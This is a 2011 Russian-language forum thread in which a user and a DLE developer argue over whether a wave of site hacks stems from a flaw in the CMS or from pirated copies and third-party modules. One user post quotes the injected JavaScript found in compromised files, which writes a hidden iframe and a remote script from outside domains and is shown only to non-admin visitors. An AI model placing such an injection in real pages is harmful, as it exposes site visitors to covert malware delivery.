celsoft 5 992 Опубликовано: 11 января 2011 Рассказать Опубликовано: 11 января 2011 А как научиться выявлять такие вот подозрительные модули через которые якобы вся беда? Нужно обладать знаниями PHP, чтобы понимать что они делают. Или хотя бы как минимум не скачивать их с варезных сайтов. Цитата Ссылка на сообщение Поделиться на других сайтах
gruppastimul 0 Опубликовано: 13 января 2011 Рассказать Опубликовано: 13 января 2011 Вы почему то решили что если стоит DLE, то значит проблема именно в DLE, помимо DLE на сервере стоит с десяток программ, безопасностью которых также нужно заниматься. А Вы почему-то во всех ответах перекладываете ответственность на сторонние показатели, но не как не на сам скрипт, а то что атаки подверглись последние версии DLE начиная от 7ки, как лицензии так и нет, с модулями и без, на разных хостингах в один и тот же промежуток времени с файлами js в содержании которых к примеру есть if ( dle_admin == "" ) {document.write('<iframe width="0%" height="0%" style="border: 0px;" src="http://traffffff.ipq.co/"></iframe><script language="JavaScript" type="text/javascript" src="http://www.karbrrbrr.co.cc/file.jss"></script>');} это можно увидеть перейдя на атакующий сайт http://www.karbrrbrr.co.cc . Я тут вижу, что связь с dle самая прямая. И атакуются именно сайты на DLE. И не один, а массы. Хостинги разные. phpmyadminы разные. И заплатки стоят. Объединяющее звено в одной беде DLE - не находите? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 992 Опубликовано: 13 января 2011 Рассказать Опубликовано: 13 января 2011 А Вы почему-то во всех ответах перекладываете ответственность на сторонние показатели Что за глупости, каждый клиентский сайт подвергается тщательному персональному анализу, и выносится по каждому сайту свои собственные и персональные выводы. И если виной сторонние показатели, то так и указывается, если виной тому DLE, то так и указывается причина и способы устранения. И каждый клиент может обратиться в службу поддержки и предоставить доступы для анализа. Цитата Ссылка на сообщение Поделиться на других сайтах
gruppastimul 0 Опубликовано: 13 января 2011 Рассказать Опубликовано: 13 января 2011 Неужели до сих пор не смогли понять, что это глобальный взлом ? Ведь разговор про это идет не на 1 сайте и страницы обсуждения зашкаливают. Много сайтов подверглось взлому и никто не прислал данные для анализа? Ведь в данной ситуации далеко не персональные выводы должны быть выявлены. В итоге все сошлется на дыры в phpmyadmine, а спустя время выйдет патч к примеру на mysqli.class.php... Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 992 Опубликовано: 13 января 2011 Рассказать Опубликовано: 13 января 2011 Неужели до сих пор не смогли понять, что это глобальный взлом ? Ведь разговор про это идет не на 1 сайте и страницы обсуждения зашкаливают. Много сайтов подверглось взлому и никто не прислал данные для анализа? Ведь в данной ситуации далеко не персональные выводы должны быть выявлены. В итоге все сошлется на дыры в phpmyadmine, а спустя время выйдет патч к примеру на mysqli.class.php... Все кто был клиентами прислали, и причины по каждому сайту установлены, и ни один не подвергался какой то неизвестной уязвимости. Поэтому если вы клиент, можете прислать и ваш сайт будет проверен и причины названы. А по поводу много, так это не более десяти сайтов клиентов, при нескольких тысячах, все остальные это пользователи нелегальных копий скрипта. Тут вообще часто приходят пользователи нелегальных копий, возмущаются, а когда им говорят напишите в службу поддержки, ваша проблема будет проверена и решена, испаряются, возмущаться и жаловаться на других форумах. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.